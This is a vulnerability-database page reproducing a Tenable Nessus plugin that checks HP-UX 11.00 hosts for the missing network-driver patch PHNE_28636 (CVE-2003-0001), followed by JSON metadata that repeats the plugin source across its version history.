Search...

HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)

2005-03-18T00:00:00

ID HPUX_PHNE_28636.NASL
Type nessus
Reporter Tenable
Modified 2013-04-20T00:00:00

Description

s700_800 11.00 EISA 100BT cumulative patch :

Potential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#
# The descriptive text and patch checks in this plugin were 
# extracted from HP patch PHNE_28636. The text itself is
# copyright (C) Hewlett-Packard Development Company, L.P.
#

include("compat.inc");

if (description)
{
  script_id(17417);
  script_version("$Revision: 1.13 $");
  script_cvs_date("$Date: 2013/04/20 00:36:48 $");

  script_cve_id("CVE-2003-0001");
  script_xref(name:"CERT", value:"412115");
  script_xref(name:"HP", value:"HPSBUX0305");
  script_xref(name:"HP", value:"SSRT3451");

  script_name(english:"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)");
  script_summary(english:"Checks for the patch in the swlist output");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote HP-UX host is missing a security-related patch."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"s700_800 11.00 EISA 100BT cumulative patch : 

Potential for Ethernet device drivers to reuse packet data for
padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001."
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Install patch PHNE_28636 or subsequent."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:hp:hp-ux");

  script_set_attribute(attribute:"patch_publication_date", value:"2003/07/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/03/18");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.");
  script_family(english:"HP-UX Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/HP-UX/version", "Host/HP-UX/swlist");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("hpux.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/HP-UX/version")) audit(AUDIT_OS_NOT, "HP-UX");
if (!get_kb_item("Host/HP-UX/swlist")) audit(AUDIT_PACKAGE_LIST_MISSING);

if (!hpux_check_ctx(ctx:"11.00"))
{
  exit(0, "The host is not affected since PHNE_28636 applies to a different OS release.");
}

patches = make_list("PHNE_28636");
foreach patch (patches)
{
  if (hpux_installed(app:patch))
  {
    exit(0, "The host is not affected because patch "+patch+" is installed.");
  }
}


flag = 0;
if (hpux_check_patch(app:"100BT-EISA-FMT.100BT-FORMAT", version:"B.11.00.01")) flag++;
if (hpux_check_patch(app:"100BT-EISA-FMT.100BT-FORMAT", version:"B.11.00.02")) flag++;
if (hpux_check_patch(app:"100BT-EISA-FMT.100BT-FORMAT", version:"B.11.00.03")) flag++;
if (hpux_check_patch(app:"100BT-EISA-FMT.100BT-FORMAT", version:"B.11.00.04")) flag++;
if (hpux_check_patch(app:"100BT-EISA-KRN.100BT-KRN", version:"B.11.00.01")) flag++;
if (hpux_check_patch(app:"100BT-EISA-KRN.100BT-KRN", version:"B.11.00.02")) flag++;
if (hpux_check_patch(app:"100BT-EISA-KRN.100BT-KRN", version:"B.11.00.03")) flag++;
if (hpux_check_patch(app:"100BT-EISA-KRN.100BT-KRN", version:"B.11.00.04")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-INIT", version:"B.11.00.01")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-INIT", version:"B.11.00.02")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-INIT", version:"B.11.00.03")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-INIT", version:"B.11.00.04")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-RUN", version:"B.11.00.01")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-RUN", version:"B.11.00.02")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-RUN", version:"B.11.00.03")) flag++;
if (hpux_check_patch(app:"100BT-EISA-RUN.100BT-RUN", version:"B.11.00.04")) flag++;


if (flag)
{
  if (report_verbosity &gt; 0) security_warning(port:0, extra:hpux_report_get());
  else security_warning(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "HPUX_PHNE_28636.NASL", "bulletinFamily": "scanner", "title": "HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "description": "s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "published": "2005-03-18T00:00:00", "modified": "2013-04-20T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=17417", "reporter": "Tenable", "references": [], "cvelist": ["CVE-2003-0001"], "type": "nessus", "lastseen": "2018-09-01T23:47:56", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:hp:hp-ux"], "cvelist": ["CVE-2003-0001"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "83c0128f729f72a5f55f37c6d66bf4e1a6eb2f985ba5fc31624412e4e09a4fbf", "hashmap": [{"hash": "e1777e6c2e94ff29d63dc0883d740876", "key": "cvelist"}, {"hash": "634d1af54c551c354e3204db0cbbc77a", "key": "modified"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8a41d28221c79eca7074f51fc96b542d", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7bcab4942f4f7e074eb4f7b4ecdf4f61", "key": "pluginID"}, {"hash": "afe57d0304e958202be29619fb28e901", "key": "cpe"}, {"hash": "2c90988f12d0f55d79edd4070999e39d", "key": "published"}, {"hash": "895f2a7b18396afc127ce655b15f4750", "key": "title"}, {"hash": "818c6bb883cdd9080fba437c46f3f9d3", "key": "description"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "220d862610286795a31951b35a56c058", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17417", "id": "HPUX_PHNE_28636.NASL", "lastseen": "2017-10-29T13:38:34", "modified": "2013-04-20T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.3", "pluginID": "17417", "published": "2005-03-18T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28636. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17417);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28636 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28636 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28636\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:38:34"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:hp:hp-ux"], "cvelist": ["CVE-2003-0001"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "ed897d6d5e82e68850f26fc3f110b86d668697969e18d9b27302532f20fe77f8", "hashmap": [{"hash": "e1777e6c2e94ff29d63dc0883d740876", "key": "cvelist"}, {"hash": "634d1af54c551c354e3204db0cbbc77a", "key": "modified"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8a41d28221c79eca7074f51fc96b542d", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7bcab4942f4f7e074eb4f7b4ecdf4f61", "key": "pluginID"}, {"hash": "afe57d0304e958202be29619fb28e901", "key": "cpe"}, {"hash": "2c90988f12d0f55d79edd4070999e39d", "key": "published"}, {"hash": "895f2a7b18396afc127ce655b15f4750", "key": "title"}, {"hash": "818c6bb883cdd9080fba437c46f3f9d3", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "220d862610286795a31951b35a56c058", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17417", "id": "HPUX_PHNE_28636.NASL", "lastseen": "2018-08-30T19:41:41", "modified": "2013-04-20T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.3", "pluginID": "17417", "published": "2005-03-18T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28636. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17417);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28636 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28636 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28636\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:41:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2003-0001"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 1, "enchantments": {}, "hash": "aac65526c82af409a15fe1cff5e252c8881a71a4dbe9f85814032541b26a3d5c", "hashmap": [{"hash": "e1777e6c2e94ff29d63dc0883d740876", "key": "cvelist"}, {"hash": "634d1af54c551c354e3204db0cbbc77a", "key": "modified"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8a41d28221c79eca7074f51fc96b542d", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7bcab4942f4f7e074eb4f7b4ecdf4f61", "key": "pluginID"}, {"hash": "2c90988f12d0f55d79edd4070999e39d", "key": "published"}, {"hash": "895f2a7b18396afc127ce655b15f4750", "key": "title"}, {"hash": "818c6bb883cdd9080fba437c46f3f9d3", "key": "description"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "220d862610286795a31951b35a56c058", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17417", "id": "HPUX_PHNE_28636.NASL", "lastseen": "2016-09-26T17:24:44", "modified": "2013-04-20T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.2", "pluginID": "17417", "published": "2005-03-18T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28636. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17417);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28636 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28636 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28636\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "viewCount": 2}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:44"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "afe57d0304e958202be29619fb28e901"}, {"key": "cvelist", "hash": "e1777e6c2e94ff29d63dc0883d740876"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "description", "hash": "818c6bb883cdd9080fba437c46f3f9d3"}, {"key": "href", "hash": "8a41d28221c79eca7074f51fc96b542d"}, {"key": "modified", "hash": "634d1af54c551c354e3204db0cbbc77a"}, {"key": "naslFamily", "hash": "f537a8c4c2a2ecce05af223984a006fc"}, {"key": "pluginID", "hash": "7bcab4942f4f7e074eb4f7b4ecdf4f61"}, {"key": "published", "hash": "2c90988f12d0f55d79edd4070999e39d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "220d862610286795a31951b35a56c058"}, {"key": "title", "hash": "895f2a7b18396afc127ce655b15f4750"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "83c0128f729f72a5f55f37c6d66bf4e1a6eb2f985ba5fc31624412e4e09a4fbf", "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28636. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17417);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28636 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n 